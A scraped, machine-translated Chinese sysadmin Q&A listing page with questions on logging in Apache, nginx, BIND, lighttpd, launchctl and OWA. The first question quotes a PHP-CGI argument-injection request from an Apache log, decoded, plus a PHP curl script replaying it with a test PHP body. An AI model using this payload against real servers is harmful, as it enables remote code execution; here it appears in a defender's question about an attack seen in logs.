服务器 Gind.cn

Articles of 胶水logging

phppath / php作为URL有奇怪的行为,似乎是一个攻击

警告:以下请求可能会损害您的服务器。 我在apache日志中得到了一些奇怪的东西: "POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 200 276 "-" "-" 意即: POST /phppath/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -n 正如你可以看到这给200,但是当我用curl运行它: <?php $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://aussehenwie.de/%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E"); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, "<?php echo 'hacked'; "); echo curl_exec($ch); curl_close($ch); ?> 它返回一个404.这是一样的,当我从terminal运行它。 为什么? 这个尴尬的URL在做什么?

CNAME不工作响应403禁止

我为一个域创build了CNAME(test.mycompanyname.com)(test.example.com)。 我们刚刚像下面那样configuration了CNAME, test.mycompanyname.com CNAME test.example.com 当我们尝试在地址栏中input“test.mycompanyname.com”时,它会回应403 Forbidden错误信息。 如何解决这个问题? 问候,Karthik。

launchctl不会加载这个LaunchAgent的php-fpm

我正在尝试使用launchctl启动php-fpm 。 直接从命令行运行是没有问题的: $ /usr/sbin/php-fpm -p /Users/dmitry -e 这里是/Users/dmitry/Library/LaunchAgents/dminkovsky.php-fpm.plist的内容: <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>Label</key> <string>dminkovsky.php-fpm</string> <key>ProgramArguments</key> <array> <string>/usr/sbin/php-fpm</string> <string>-p</string> <string>/Users/dmitry/var</string> <string>-e</string> </array> <key>EnableGlobbing</key> <true/> <key>RunAtLoad</key> <true/> <key>KeepAlive</key> <true/> </dict> </plist> 出于某种原因,该过程不会从此.plist开始。 没有logging,所以我不知道为什么。 在/var/log/system.log ,我有: Nov 18 08:38:30 airosol com.apple.launchd.peruser.503[285] (dminkovsky.php-fpm[19833]): Exited with code: 78 Nov 18 […]

找出用户是否login到OWA /阅读他的电子邮件

有没有办法找出,用户最后一次loginOWA的时间是多less? (其实,如果他看了他的电子邮件,会发现更好,但我认为这是不可能的。) 如果有日志包含这类活动,我可以在哪里find它们? 或者如果他们需要被激活,我可以在哪里做到这一点?

使nginx不能在错误日志中logging“基本authentication没有提供用户/密码”

我已经通过添encryption码保护function,通过nginx添加到我的许多域中: auth_basic "Restricted"; auth_basic_user_file /usr/ssl/htpasswd; 到nginx的vhosts。 为了消除所有错误,我将所有错误logging到日志文件中,但是由于密码保护,我的日志文件中出现大量“没有提供基本身份validation的用户/密码”错误。 我想告诉nginx不要logging这些错误..是否有一个指令来做到这一点? 我看了,但还没有find它… 如果你知道,那么请告诉我。 谢谢!

绑定请求的DNS服务器IP日志

我有一个DNS服务器运行在一个虚拟的Linux机器上有几个IP地址。 绑定提供了一些非常详细的debugging日志,但是,似乎没有logging的一条信息是请求的 IP地址。 例如,如果我在同一个机器上运行谷歌的DNS服务器8.8.8.8和8.8.4.4,我会查看用户是否通过8.8.8.8或8.8.4.4请求DNSlogging。 理想情况下,我不想涉及其他networkingstream量监测工具,并坚持使用BIND。 我的另一个兴趣是根据请求的服务器ip来改变响应,类似于bind中的view子句,但是如果能够实现前者,那么看起来似乎会简单得多。 谢谢!

旋转整个/ var / log

我想每天轮换我的服务器上的整个/ var / log文件夹,所以我有/ var / log文件夹和压缩文件,如包含整个目录的“log.1.gz”。 我找不到任何可以做到这一点的手册页。

nginx:停止来自search引擎机器人的错误日志

我有一个centos 7服务器nginx 1.6.2,我想停止错误日志,当一个search引擎的僵尸程序在我的网站发生404错误。 这是为了有一个干净的错误日志,只有“真正的错误”。 这怎么可能 ? 我已经在我的虚拟主机中试过了,但是不起作用 server { … error_log /var/log/nginx/errors.log; if ($http_user_agent ~* (googlebot|yahoo|bingbot)) { error_log /dev/null crit; } … } 作为回报,nginx服务重启失败: nginx:[emerg]“error_log”指令在/etc/nginx/conf.d/mysite.conf中不允许:18 一个主意 ? 先谢谢你 !

在AJP连接上logging传出的Apache端口

我有Tomcat 7设置与mod_jk和AJP一起工作。 我想知道,如果在Tomcat方面,我可以使用Tomcat请求处理程序线程名称loggingmod_jk(Apache端)输出端口,以便跟踪端到端networkingstream量。

Lighttpd错误日志增加太快

我正在使用lighttpd v1.4.35,并且我开发了一个简单的网页,其中包含一些要testing的链接。 点击后,我注意到错误日志增加太快 。 在/etc/lighttpd/lighttpd.conf我有server.errorlogpath设置为: server.errorlog = "/myPartition/myFolder/error.log" 错误日志中的条目示例: 2015-02-19 13:41:28: (log.c.164) server started 2015-02-19 13:41:57: (response.c.339) — splitting Request-URI 2015-02-19 13:41:57: (response.c.340) Request-URI : /versions.php 2015-02-19 13:41:57: (response.c.341) URI-scheme : http 2015-02-19 13:41:57: (response.c.342) URI-authority : 172.22.196.7 2015-02-19 13:41:57: (response.c.343) URI-path (raw) : /versions.php 2015-02-19 13:41:57: (response.c.344) URI-path (clean): /versions.php 2015-02-19 13:41:57: (response.c.345) URI-query […]
Intereting Posts
NLB端口规则 – 加载重量为100 使用Mac OS X Server作为开发环境 如何阻止Internet Explorer跟踪在其他应用程序中打开的文件的历史logging? HTTP请求正好挂起了150秒,然后提供不完整的响应。 我如何知道发生了什么? 使用iptables来logging除两个地址以外的连接 禁用应用程序池的空闲超时有什么危害吗? 在Ubuntu上安装OpenERP 无法在我的Ubuntu中添加静态路由,SIOCADDRT:networking无法访问 市场ami的可用实例types RHEL 7.2:使用领域joinAD域 Windows Server 2008:如何将零售版本的许可证切换到MAPS,反之亦然? 传入的SSH在FreeBSD 7.2上停止工作 Django(uWSGI)和php(fastcgi)NGINX 为什么机器使用Active Directory时Mac OS X软件更新无法工作? 如何从Azure存储资源pipe理器中删除旧会话?